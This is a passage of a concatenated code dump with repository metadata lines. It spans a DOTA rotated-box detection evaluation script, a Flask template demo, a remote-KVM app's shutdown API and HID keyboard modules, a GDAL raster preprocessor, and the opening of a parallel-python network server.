r_ind = np.argmax(pts[:,0])
t_ind = np.argmin(pts[:,1])
b_ind = np.argmax(pts[:,1])
tt_new = pts[t_ind,:]
rr_new = pts[r_ind,:]
bb_new = pts[b_ind,:]
ll_new = pts[l_ind,:]
return tt_new,rr_new,bb_new,ll_new
def ex_box_jaccard(a, b):
a = np.asarray(a, np.float32)
b = np.asarray(b, np.float32)
inter_x1 = np.maximum(np.min(a[:,0]), np.min(b[:,0]))
inter_x2 = np.minimum(np.max(a[:,0]), np.max(b[:,0]))
inter_y1 = np.maximum(np.min(a[:,1]), np.min(b[:,1]))
inter_y2 = np.minimum(np.max(a[:,1]), np.max(b[:,1]))
if inter_x1>=inter_x2 or inter_y1>=inter_y2:
return 0.
x1 = np.minimum(np.min(a[:,0]), np.min(b[:,0]))
x2 = np.maximum(np.max(a[:,0]), np.max(b[:,0]))
y1 = np.minimum(np.min(a[:,1]), np.min(b[:,1]))
y2 = np.maximum(np.max(a[:,1]), np.max(b[:,1]))
    mask_w = int(np.ceil(x2-x1))
    mask_h = int(np.ceil(y2-y1))
mask_a = np.zeros(shape=(mask_h, mask_w), dtype=np.uint8)
mask_b = np.zeros(shape=(mask_h, mask_w), dtype=np.uint8)
a[:,0] -= x1
a[:,1] -= y1
b[:,0] -= x1
b[:,1] -= y1
mask_a = cv2.fillPoly(mask_a, pts=np.asarray([a], 'int32'), color=1)
mask_b = cv2.fillPoly(mask_b, pts=np.asarray([b], 'int32'), color=1)
inter = np.logical_and(mask_a, mask_b).sum()
union = np.logical_or(mask_a, mask_b).sum()
iou = float(inter)/(float(union)+1e-12)
# cv2.imshow('img1', np.uint8(mask_a*255))
# cv2.imshow('img2', np.uint8(mask_b*255))
# k = cv2.waitKey(0)
# if k==ord('q'):
# cv2.destroyAllWindows()
# exit()
return iou
def cal_bbox_pts(pts_4):
x1 = np.min(pts_4[:,0])
x2 = np.max(pts_4[:,0])
y1 = np.min(pts_4[:,1])
y2 = np.max(pts_4[:,1])
bl = [x1, y2]
tl = [x1, y1]
tr = [x2, y1]
br = [x2, y2]
return np.asarray([bl, tl, tr, br], np.float32)
def parse_gt(filename):
"""
:param filename: ground truth file to parse
:return: all instances in a picture
"""
objects = []
with open(filename, 'r') as f:
while True:
line = f.readline()
if line:
splitlines = line.strip().split(' ')
object_struct = {}
if (len(splitlines) < 9):
continue
object_struct['name'] = splitlines[8]
if (len(splitlines) == 9):
object_struct['difficult'] = 0
elif (len(splitlines) == 10):
object_struct['difficult'] = int(splitlines[9])
object_struct['bbox'] = [float(splitlines[0]),
float(splitlines[1]),
float(splitlines[2]),
float(splitlines[3]),
float(splitlines[4]),
float(splitlines[5]),
float(splitlines[6]),
float(splitlines[7])]
# generate ground truth of theta: [0, 360)
# directional BBA vectors: pts from ann, ct from minAreaRect
ann_pts = np.asarray(object_struct['bbox'], np.float32).reshape((-1, 2))
pt_0 = ann_pts[0,:]
pt_1 = ann_pts[1,:]
direction_vec = (np.asarray(pt_0,np.float32)+np.asarray(pt_1,np.float32))/2
rect = cv2.minAreaRect(ann_pts)
(cen_x, cen_y), (bbox_w, bbox_h), theta = rect
ct = np.asarray([cen_x, cen_y], np.float32)
direction_vec = 100*(direction_vec - ct)
norm_direction_vec = np.linalg.norm(direction_vec)
direction_mask = float((direction_vec[1] >= 0))
theta = np.arccos(direction_vec[0]/norm_direction_vec)*direction_mask + \
(np.radians(360) - np.arccos(direction_vec[0]/norm_direction_vec))*(1 - direction_mask)
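                # Worked example (image coordinates, y axis pointing down):
                #   direction_vec = (1, 0)  -> theta = 0
                #   direction_vec = (0, 1)  -> direction_mask = 1, theta = pi/2   (90 deg)
                #   direction_vec = (0, -1) -> direction_mask = 0, theta = 3*pi/2 (270 deg)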
# # generate ground truth of direction
# # result direction: det_directional_BBAvec compared with det_BBAvec
# # gt direction: ann_directional_BBAvec compared with ann_BBAvec
# # ann_directional_BBAvec
# # directional BBA vectors: pts from ann, ct from minAreaRect
# ann_pts = np.asarray(object_struct['bbox'], np.float32).reshape((-1, 2))
# pt_0 = ann_pts[0,:]
# pt_1 = ann_pts[1,:]
# direction_vec = (np.asarray(pt_0,np.float32)+np.asarray(pt_1,np.float32))/2
# # ann_BBAvec
# # BBA vectors: pts from minAreaRect, ct from minAreaRect
# rect = cv2.minAreaRect(ann_pts)
# (cen_x, cen_y), (bbox_w, bbox_h), theta = rect
# ct = np.asarray([cen_x, cen_y], np.float32)
# pts_4 = cv2.boxPoints(((cen_x, cen_y), (bbox_w, bbox_h), theta)) # 4 x 2
# bl = pts_4[0,:]
# tl = pts_4[1,:]
# tr = pts_4[2,:]
# br = pts_4[3,:]
# tt = (np.asarray(tl,np.float32)+np.asarray(tr,np.float32))/2
# rr = (np.asarray(tr,np.float32)+np.asarray(br,np.float32))/2
# bb = (np.asarray(bl,np.float32)+np.asarray(br,np.float32))/2
# ll = (np.asarray(tl,np.float32)+np.asarray(bl,np.float32))/2
# # reorder BBA vectors
# if theta in [-90.0, -0.0, 0.0]: # (-90, 0]
# tt,rr,bb,ll = reorder_pts(tt,rr,bb,ll)
# cls_theta = 0
# jaccard_score = ex_box_jaccard(pts_4.copy(), cal_bbox_pts(pts_4).copy())
# if jaccard_score<0.95:
# cls_theta = 1
# tt_x = tt[0]*cls_theta + cen_x*(1 - cls_theta)
# tt_y = tt[1]*cls_theta + (cen_y - bbox_h)*(1 - cls_theta)
# rr_x = rr[0]*cls_theta + (cen_x + bbox_w)*(1 - cls_theta)
# rr_y = rr[1]*cls_theta + cen_y*(1 - cls_theta)
# bb_x = bb[0]*cls_theta + cen_x*(1 - cls_theta)
# bb_y = bb[1]*cls_theta + (cen_y + bbox_h)*(1 - cls_theta)
# ll_x = ll[0]*cls_theta + (cen_x - bbox_w)*(1 - cls_theta)
# ll_y = ll[1]*cls_theta + cen_y*(1 - cls_theta)
# tt = np.asarray([tt_x, tt_y], np.float32)
# rr = np.asarray([rr_x, rr_y], np.float32)
# bb = np.asarray([bb_x, bb_y], np.float32)
# ll = np.asarray([ll_x, ll_y], np.float32)
# # compute all BBA vectors and main direction vector
# tt = 100*(tt - ct)
# rr = 100*(rr - ct)
# bb = 100*(bb - ct)
# ll = 100*(ll - ct)
# direction_vec = 100*(direction_vec - ct)
# # compute cos and direction (0 to 3: tt rr bb ll)
# norm_tt = np.linalg.norm(tt)
# norm_rr = np.linalg.norm(rr)
# norm_bb = np.linalg.norm(bb)
# norm_ll = np.linalg.norm(ll)
# norm_direction_vec = np.linalg.norm(direction_vec)
# cos_tt = np.sum(tt*direction_vec)/norm_tt/norm_direction_vec
# cos_rr = np.sum(rr*direction_vec)/norm_rr/norm_direction_vec
# cos_bb = np.sum(bb*direction_vec)/norm_bb/norm_direction_vec
# cos_ll = np.sum(ll*direction_vec)/norm_ll/norm_direction_vec
# cos_all = np.asarray([cos_tt,cos_rr,cos_bb,cos_ll], np.float32)
# direction = np.argmax(cos_all)
# # another way (not recommended)
# center_pt_x = np.mean(np.array([float(splitlines[0]), float(splitlines[2]),
# float(splitlines[4]), float(splitlines[6])]))
# center_pt_y = np.mean(np.array([float(splitlines[1]), float(splitlines[3]),
# float(splitlines[5]), float(splitlines[7])]))
# direction_vec_x = (float(splitlines[0]) + float(splitlines[2]))/2 - center_pt_x
# direction_vec_y = (float(splitlines[1]) + float(splitlines[3]))/2 - center_pt_y
# if direction_vec_x >= 0 and direction_vec_y < 0:
# direction = 0 # tt
# elif direction_vec_x < 0 and direction_vec_y <= 0:
# direction = 3 # ll
# elif direction_vec_x <= 0 and direction_vec_y > 0:
# direction = 2 # bb
# elif direction_vec_x > 0 and direction_vec_y >= 0:
# direction = 1 # rr
# else:
# raise ValueError('direction error')
# object_struct['direction'] = int(direction)
object_struct['theta'] = theta
objects.append(object_struct)
else:
break
return objects
def voc_ap(rec, prec, use_07_metric=False):
""" ap = voc_ap(rec, prec, [use_07_metric])
Compute VOC AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec >= t) == 0:
p = 0
else:
p = np.max(prec[rec >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def voc_eval(detpath,
annopath,
imagesetfile,
classname,
# cachedir,
ovthresh=0.5,
use_07_metric=False):
"""rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
[ovthresh],
[use_07_metric])
Top level function that does the PASCAL VOC evaluation.
detpath: Path to detections
detpath.format(classname) should produce the detection results file.
annopath: Path to annotations
annopath.format(imagename) should be the xml annotations file.
imagesetfile: Text file containing the list of images, one image per line.
classname: Category name (duh)
cachedir: Directory for caching the annotations
[ovthresh]: Overlap threshold (default = 0.5)
[use_07_metric]: Whether to use VOC07's 11 point AP computation
(default False)
"""
# assumes detections are in detpath.format(classname)
# assumes annotations are in annopath.format(imagename)
# assumes imagesetfile is a text file with each line an image name
# cachedir caches the annotations in a pickle file
# first load gt
#if not os.path.isdir(cachedir):
# os.mkdir(cachedir)
#cachefile = os.path.join(cachedir, 'annots.pkl')
# read list of images
with open(imagesetfile, 'r') as f:
lines = f.readlines()
imagenames = [x.strip() for x in lines]
#print('imagenames: ', imagenames)
#if not os.path.isfile(cachefile):
# load annots
recs = {}
for i, imagename in enumerate(imagenames):
#print('parse_files name: ', annopath.format(imagename))
recs[imagename] = parse_gt(annopath.format(imagename))
#if i % 100 == 0:
# print ('Reading annotation for {:d}/{:d}'.format(
# i + 1, len(imagenames)) )
# save
#print ('Saving cached annotations to {:s}'.format(cachefile))
#with open(cachefile, 'w') as f:
# cPickle.dump(recs, f)
#else:
# load
#with open(cachefile, 'r') as f:
# recs = cPickle.load(f)
# extract gt objects for this class
class_recs = {}
npos = 0
for imagename in imagenames:
R = [obj for obj in recs[imagename] if obj['name'] == classname]
bbox = np.array([x['bbox'] for x in R])
difficult = np.array([x['difficult'] for x in R]).astype(bool)
# directions = np.array([x['direction'] for x in R]).astype(np.int32)
thetas = np.array([x['theta'] for x in R]).astype(np.float32)
det = [False] * len(R)
npos = npos + sum(~difficult)
class_recs[imagename] = {'bbox': bbox,
'difficult': difficult,
# 'direction': directions,
'theta': thetas,
'det': det}
# read dets from Task1* files
detfile = detpath.format(classname)
with open(detfile, 'r') as f:
lines = f.readlines()
splitlines = [x.strip().split(' ') for x in lines]
image_ids = [x[0] for x in splitlines]
confidence = np.array([float(x[1]) for x in splitlines])
# directions = np.array([int(float(x[2])) for x in splitlines])
thetas = np.array([float(x[3]) for x in splitlines])
#print('check confidence: ', confidence)
BB = np.array([[float(z) for z in x[4:]] for x in splitlines])
# if no detected target
if BB.shape[0] == 0:
print('no ' + classname)
return 0, 0, 0, 0
# sort by confidence
sorted_ind = np.argsort(-confidence)
sorted_scores = np.sort(-confidence)
#print('check sorted_scores: ', sorted_scores)
#print('check sorted_ind: ', sorted_ind)
## note the usage only in numpy not for list
BB = BB[sorted_ind, :]
image_ids = [image_ids[x] for x in sorted_ind]
# directions = [directions[x] for x in sorted_ind]
thetas = [thetas[x] for x in sorted_ind]
#print('check imge_ids: ', image_ids)
#print('imge_ids len:', len(image_ids))
# go down dets and mark TPs and FPs
nd = len(image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
t_direction = np.zeros(nd)
count = 0
for d in range(nd):
R = class_recs[image_ids[d]]
bb = BB[d, :].astype(float)
# direction = directions[d].astype(int)
theta = thetas[d].astype(float)
ovmax = -np.inf
BBGT = R['bbox'].astype(float)
# direction_gt = R['direction'].astype(int)
theta_gt = R['theta'].astype(float)
## compute det bb with each BBGT
if BBGT.size > 0:
# compute overlaps
# intersection
# 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.
# pdb.set_trace()
BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)
BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)
BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)
BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)
bb_xmin = np.min(bb[0::2])
bb_ymin = np.min(bb[1::2])
bb_xmax = np.max(bb[0::2])
bb_ymax = np.max(bb[1::2])
ixmin = np.maximum(BBGT_xmin, bb_xmin)
iymin = np.maximum(BBGT_ymin, bb_ymin)
ixmax = np.minimum(BBGT_xmax, bb_xmax)
iymax = np.minimum(BBGT_ymax, bb_ymax)
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +
(BBGT_xmax - BBGT_xmin + 1.) *
(BBGT_ymax - BBGT_ymin + 1.) - inters)
overlaps = inters / uni
BBGT_keep_mask = overlaps > 0
BBGT_keep = BBGT[BBGT_keep_mask, :]
BBGT_keep_index = np.where(overlaps > 0)[0]
# pdb.set_trace()
def calcoverlaps(BBGT_keep, bb):
overlaps = []
for index, GT in enumerate(BBGT_keep):
overlap = polyiou.iou_poly(polyiou.VectorDouble(BBGT_keep[index]), polyiou.VectorDouble(bb))
overlaps.append(overlap)
return overlaps
if len(BBGT_keep) > 0:
overlaps = calcoverlaps(BBGT_keep, bb)
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
# pdb.set_trace()
jmax = BBGT_keep_index[jmax]
if ovmax > ovthresh:
if not R['difficult'][jmax]:
if not R['det'][jmax]:
# compare direction
# if direction == direction_gt[jmax]:
# t_direction[d] = 1
# else:
# print(direction, direction_gt[jmax], bb, BBGT_keep, '\n')
# compare theta
if np.fabs((theta - theta_gt[jmax])) <= np.radians(30):
t_direction[d] = 1
# else:
# print(theta, theta_gt[jmax], bb, BBGT_keep, '\n')
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
count = count + 1
# compute the accuracy of direction
t_direction = np.sum(t_direction)
if t_direction == 0:
acc_direction = float(0)
else:
acc_direction = t_direction / float(np.sum(tp))
# compute precision recall
print('check fp:', fp)
print('check tp', tp)
print('npos num:', npos)
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(npos)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = voc_ap(rec, prec, use_07_metric)
return rec, prec, ap, acc_direction
def main():
# ##TODO: wrap the code in the main
# detpath = r'/home/dingjian/Documents/Research/experiments/light_head_faster_rotbox_best_point/Task1_results_0.1_nms_epoch18/results/Task1_{:s}.txt'
# annopath = r'/home/dingjian/code/DOTA/DOTA/media/OrientlabelTxt-utf-8/{:s}.txt'# change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
# imagesetfile = r'/home/dingjian/code/DOTA/DOTA/media/testset.txt'
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
detpath = r'D:\\137\\workspace\\python_projects\\BBAVectors-Oriented-Object-Detection\\result_dota\\Task1_{:s}.txt'
annopath = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_TrainVal\\labelTxt\\{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
imagesetfile = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_TrainVal\\valset.txt'
# annopath = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_All\\labelTxt\\{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
# imagesetfile = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_All\\valset.txt'
# For DOTA-v1.5
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter', 'container-crane']
# For DOTA-v1.0
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
classnames = ['pkw', 'pkw_trail', 'truck', 'truck_trail', 'van_trail', 'cam', 'bus']
classaps = []
class_acc = []
map = 0
macc = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap, acc_direction = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
# count acc_direction
macc = macc + acc_direction
print('accuracy_direction: ', acc_direction)
class_acc.append(acc_direction)
        # uncomment to show p-r curve of each category
# plt.figure(figsize=(8,4))
# plt.xlabel('recall')
# plt.ylabel('precision')
# plt.plot(rec, prec)
# plt.show()
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
# show acc_direction
macc = macc/len(classnames)
print('mean acc_direction: ', macc)
class_acc = 100*np.array(class_acc)
print('class acc_direction: ', class_acc)
if __name__ == '__main__':
main()
```
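A minimal usage sketch of `voc_eval` for a single class (the paths, the module import and the class name below are placeholders, not taken from the repository):

```python
# Hedged sketch: assumes dota_evaluation_task1.py is importable and the Task1 file layout exists.
from dota_evaluation_task1 import voc_eval

rec, prec, ap, acc_direction = voc_eval(
    detpath=r'./result_dota/Task1_{:s}.txt',        # per-class detection files
    annopath=r'./DOTA_TrainVal/labelTxt/{:s}.txt',  # per-image ground-truth label files
    imagesetfile=r'./DOTA_TrainVal/valset.txt',     # one image id per line
    classname='pkw',
    ovthresh=0.5,
    use_07_metric=True)
print('AP: %.4f, direction accuracy: %.4f' % (ap, acc_direction))
```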
#### File: BBAVectors-Oriented-Object-Detection/my_tools/train_split.py
```python
import os
import glob
def run(data_dir, split):
img_list = sorted(glob.glob(os.path.join(data_dir, 'images', '*.png')))
train_list = img_list[:split]
test_list = img_list[split:]
with open(os.path.join(data_dir, 'trainval.txt'), 'w') as f:
for img_path in train_list:
img_name = img_path.split('\\')[-1].split('.')[0]
f.write(img_name + '\n')
with open(os.path.join(data_dir, 'test.txt'), 'w') as f:
for img_path in test_list:
img_name = img_path.split('\\')[-1].split('.')[0]
f.write(img_name + '\n')
with open(os.path.join(data_dir, 'valset.txt'), 'w') as f:
for img_path in test_list:
img_name = img_path.split('\\')[-1].split('.')[0]
f.write(img_name + '\n')
if __name__ == '__main__':
data_dir = 'D:/137/dataset/MunichDatasetVehicleDetection-2015-old/DOTA_TrainVal'
run(data_dir, 576)
``` |
{
"source": "13871433675/helloflask",
"score": 3
} |
#### File: demos/wqztemplate/app.py
```python
from flask import Flask, render_template
app = Flask(__name__)
namelist = ['chengli', 'qizhi', 'zhangsan', 'wangqizhi']
name2 = 'wangqizhi'
user = {
'username': 'Grey Li',
'bio': 'A boy who loves movies and music.',
}
movies = [
{'name': 'My Neighbor Totoro', 'year': '1988'},
{'name': 'Three Colours trilogy', 'year': '1993'},
{'name': 'Forrest Gump', 'year': '1994'},
{'name': 'Perfect Blue', 'year': '1997'},
{'name': 'The Matrix', 'year': '1999'},
{'name': 'Memento', 'year': '2000'},
{'name': 'The Bucket list', 'year': '2007'},
{'name': 'Black Swan', 'year': '2010'},
{'name': 'Gone Girl', 'year': '2014'},
{'name': 'CoCo', 'year': '2017'},
]
mylist = ['list01', 'list02']
mydic = {'name': 'dicname'}
@app.route('/')
def index():
return render_template('index.html', movies=movies, name2=name2, mylist=mylist, mydic=mydic)
@app.template_global()
def test():
return "method test!"
``` |
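The module only defines `app`, the sample data and the routes; it has no run entry point of its own. A minimal way to launch it for local testing (an assumption, not part of the original file) is the standard Flask pattern:

```python
# Hypothetical launcher; the original demo is normally started with `flask run`.
if __name__ == '__main__':
    app.run(debug=True)
```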
{
"source": "13891024810/Nokidapilot",
"score": 2
} |
#### File: Nokidapilot/app/api.py
```python
import flask
import local_system
api_blueprint = flask.Blueprint('api', __name__, url_prefix='/api')
@api_blueprint.route('/shutdown', methods=['POST'])
def shutdown_post():
try:
local_system.shutdown()
return flask.jsonify({
'success': True,
'error': None,
})
except local_system.Error as e:
return flask.jsonify({
'success': False,
'error': str(e),
}), 500
@api_blueprint.route('/restart', methods=['POST'])
def restart_post():
try:
local_system.restart()
return flask.jsonify({
'success': True,
'error': None,
})
except local_system.Error as e:
return flask.jsonify({
'success': False,
'error': str(e),
}), 500
```
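The blueprint only declares the two endpoints; it still has to be registered on a Flask application to be reachable. A minimal, hypothetical wiring (module layout assumed):

```python
# Hypothetical wiring sketch; the repo's real app factory may differ.
import flask
from api import api_blueprint

app = flask.Flask(__name__)
app.register_blueprint(api_blueprint)  # exposes POST /api/shutdown and POST /api/restart
# e.g. curl -X POST http://localhost:5000/api/shutdown
```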
#### File: app/hid/keyboard.py
```python
from hid import write as hid_write
KEYCODE_LEFT_CTRL = 0xe0
KEYCODE_LEFT_SHIFT = 0xe1
KEYCODE_LEFT_ALT = 0xe2
KEYCODE_LEFT_META = 0xe3
KEYCODE_RIGHT_CTRL = 0xe4
KEYCODE_RIGHT_SHIFT = 0xe5
KEYCODE_RIGHT_ALT = 0xe6
KEYCODE_RIGHT_META = 0xe7
_MODIFIER_KEYCODES = [
KEYCODE_LEFT_CTRL, KEYCODE_LEFT_SHIFT, KEYCODE_LEFT_ALT, KEYCODE_LEFT_META,
KEYCODE_RIGHT_CTRL, KEYCODE_RIGHT_SHIFT, KEYCODE_RIGHT_ALT,
KEYCODE_RIGHT_META
]
def send_keystroke(keyboard_path, control_keys, hid_keycode):
    # Build a single 8-byte HID keyboard report: byte 0 carries the modifier bitmask
    # and byte 2 the keycode; release_keys() later sends an all-zero report to release.
buf = [0] * 8
buf[0] = control_keys
buf[2] = hid_keycode
hid_write.write_to_hid_interface(keyboard_path, buf)
# If it's not a modifier keycode, add a message indicating that the key
# should be released after it is sent.
if hid_keycode not in _MODIFIER_KEYCODES:
release_keys(keyboard_path)
def release_keys(keyboard_path):
hid_write.write_to_hid_interface(keyboard_path, [0] * 8)
```
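For context, the 8-byte report written above follows the USB HID boot-keyboard layout: byte 0 is the modifier bitmask, byte 1 is reserved, and bytes 2-7 hold up to six keycodes. A hedged usage sketch, assuming a USB-gadget device node such as `/dev/hidg0`:

```python
# Hypothetical example: send Ctrl+Alt+Delete, followed by the automatic release.
# 0x01 = left Ctrl bit, 0x04 = left Alt bit in the modifier byte; 0x4c = HID usage id for Delete.
from hid import keyboard

keyboard.send_keystroke('/dev/hidg0', control_keys=0x01 | 0x04, hid_keycode=0x4c)
```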
#### File: app/request_parsers/keystroke.py
```python
import dataclasses
class Error(Exception):
pass
class MissingField(Error):
pass
class InvalidModifierKey(Error):
pass
class InvalidKeyCode(Error):
pass
class InvalidLocation(Error):
pass
@dataclasses.dataclass
class Keystroke:
left_ctrl_modifier: bool
left_shift_modifier: bool
left_alt_modifier: bool
left_meta_modifier: bool
right_alt_modifier: bool
key: str
key_code: int
is_right_modifier: bool
def parse_keystroke(message):
if not isinstance(message, dict):
raise MissingField(
'Keystroke parameter is invalid, expecting a dictionary data type')
required_fields = (
'key',
'keyCode',
'location',
'ctrlKey',
'shiftKey',
'altKey',
'metaKey',
'altGraphKey',
)
for field in required_fields:
if field not in message:
raise MissingField(
'Keystroke request is missing required field: %s' % field)
return Keystroke(
left_ctrl_modifier=_parse_modifier_key(message['ctrlKey']),
left_shift_modifier=_parse_modifier_key(message['shiftKey']),
left_alt_modifier=_parse_modifier_key(message['altKey']),
left_meta_modifier=_parse_modifier_key(message['metaKey']),
right_alt_modifier=_parse_modifier_key(message['altGraphKey']),
key=message['key'],
key_code=_parse_key_code(message['keyCode']),
is_right_modifier=_parse_is_right_key_location(message['location']))
def _parse_modifier_key(modifier_key):
if type(modifier_key) is not bool:
raise InvalidModifierKey('Modifier keys must be boolean values: %s' %
modifier_key)
return modifier_key
def _parse_key_code(key_code):
if type(key_code) is not int:
raise InvalidKeyCode('Key code must be an integer value: %s' % key_code)
if not (0 <= key_code <= 0xff):
raise InvalidKeyCode('Key code must be between 0x00 and 0xff: %d',
key_code)
return key_code
def _parse_is_right_key_location(location):
if location is None:
return False
if type(location) is not str:
raise InvalidLocation('Location must be "left", "right", or null.')
elif location.lower() == 'left':
return False
elif location.lower() == 'right':
return True
raise InvalidLocation('Location must be "left", "right", or null.')
``` |
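A small usage sketch of `parse_keystroke`, with a message shaped like the browser-side payload implied by `required_fields` (all values below are illustrative):

```python
# Illustrative payload only; fields mirror a browser KeyboardEvent for a plain "a" keypress.
from request_parsers import keystroke

message = {
    'key': 'a', 'keyCode': 65, 'location': None,
    'ctrlKey': False, 'shiftKey': False, 'altKey': False,
    'metaKey': False, 'altGraphKey': False,
}
ks = keystroke.parse_keystroke(message)
print(ks.key_code, ks.is_right_modifier)  # 65 False
```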
{
"source": "13903596952/gdal2tiles",
"score": 2
} |
#### File: gdal2tile-mapslicer/mapslicer/gdalpreprocess.py
```python
from osgeo import gdal
from osgeo import osr
import tempfile
import os
import preprocess
#TODO: GetText
from config import _
gdal.AllRegister()
vrt_drv = gdal.GetDriverByName( 'VRT' )
palettecolors = ['Red','Green','Blue','Alpha']
reference = osr.SpatialReference()
class PreprocessError(Exception):
"""To distinguish errors from exceptions in this module."""
def singlefile(filename, bbox = None):
"Returns [visible-filename, visible-georeference, realfilename, geotransform, xsize, ysize, srs]"
osr.DontUseExceptions()
realfilename = filename
georeference = ""
geotransform = None
srs = ""
in_ds = gdal.Open( filename, gdal.GA_ReadOnly)
if not in_ds:
# Note: GDAL prints the ERROR message too
raise PreprocessError(_("It is not possible to open the input file '%s'.") % filename)
xsize = in_ds.RasterXSize
ysize = in_ds.RasterYSize
bands = in_ds.RasterCount
geotransform = in_ds.GetGeoTransform()
srs = in_ds.GetProjection()
if bbox:
# nsew = uly lry lrx ulx
# TODO: set geotransform from [ulx, uly, lrx, lry] + xsize, ysize
geotransform = [0.0,0.0,0.0,0.0,0.0,0.0]
if len(bbox) > 4: # world file - affine transformation
geotransform[1] = bbox[0] # width of pixel
geotransform[4] = bbox[1] # rotational coefficient, zero for north up images.
geotransform[2] = bbox[2] # rotational coefficient, zero for north up images.
geotransform[5] = bbox[3] # height of pixel (but negative)
geotransform[0] = bbox[4] - 0.5*bbox[0] - 0.5*bbox[2] # x offset to center of top left pixel.
geotransform[3] = bbox[5] - 0.5*bbox[1] - 0.5*bbox[3] # y offset to center of top left pixel.
else: # bounding box
geotransform[0] = bbox[3]
geotransform[1] = (bbox[2] - bbox[3]) / float(xsize)
geotransform[2] = 0.0
geotransform[3] = bbox[0]
geotransform[4] = 0.0
geotransform[5] = (bbox[1] - bbox[0]) / float(ysize)
in_ds.SetGeoTransform(geotransform)
elif in_ds.GetGCPCount() != 0:
georeference = "GCPs"
srs = in_ds.GetGCPProjection()
geotransform = gdal.GCPsToGeoTransform(in_ds.GetGCPs())
# Maybe warping before merging ? But warping before merging should use correct pixel size based on max zoom level!
# Or merging only with affine tranformation calculated from GCPs?
# self.out_ds = gdal.AutoCreateWarpedVRT( self.in_ds, self.in_srs_wkt, self.out_srs.ExportToWkt() )
if geotransform != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) and in_ds.GetGCPCount()==0:
georeference = " ".join(map(str, geotransform))
vrtfilename = str(tempfile.mktemp(os.path.basename(filename)+'.vrt'))
# Is it a paletted raster?
if in_ds.GetRasterBand(1).GetRasterColorTable() and bands==1:
# Expand rasters with palette into RGBA
if bbox:
preprocess.Preprocess(['','-o',vrtfilename,realfilename+'::'+":".join(map(str,bbox))])
else:
preprocess.Preprocess(['','-o',vrtfilename,realfilename])
realfilename = vrtfilename
    # Did we add a new geotransform?
elif bbox:
# Save to an GDAL VRT (XML) file to save new geotransform
vrt_drv.CreateCopy(vrtfilename, in_ds)
realfilename = vrtfilename
reference.ImportFromWkt(srs)
srs = reference.ExportToPrettyWkt()
return filename, georeference, realfilename, geotransform, xsize, ysize, srs
def SRSInput(srs):
osr.UseExceptions()
reference.SetFromUserInput(srs)
return reference.ExportToPrettyWkt()
if __name__=='__main__':
import sys
if len(sys.argv) > 1:
print singlefile(sys.argv[1])
else:
print "Specify a single file to preprocess"
```
#### File: mapslicer/pp/ppserver.py
```python
import logging
import getopt
import sys
import socket
import thread
import random
import string
import time
import os
import pptransport
import ppauto
from pp import Server
copyright = "Copyright (c) 2005-2009 <NAME>. All rights reserved"
version = "1.5.7"
# compartibility with Python 2.6
try:
import hashlib
sha_new = hashlib.sha1
except ImportError:
import sha
sha_new = sha.new
class _NetworkServer(Server):
"""Network Server Class
"""
def __init__(self, ncpus="autodetect", interface="0.0.0.0",
broadcast="255.255.255.255", port=None, secret=None,
timeout=None, loglevel=logging.WARNING, restart=False,
proto=0):
Server.__init__(self, ncpus, secret=secret, loglevel=loglevel,
restart=restart, proto=proto)
self.host = interface
self.bcast = broadcast
if port is not None:
self.port = port
else:
self.port = self.default_port
self.timeout = timeout
self.ncon = 0
self.last_con_time = time.time()
self.ncon_lock = thread.allocate_lock()
logging.debug("Strarting network server interface=%s port=%i"
% (self.host, self.port))
if self.timeout is not None:
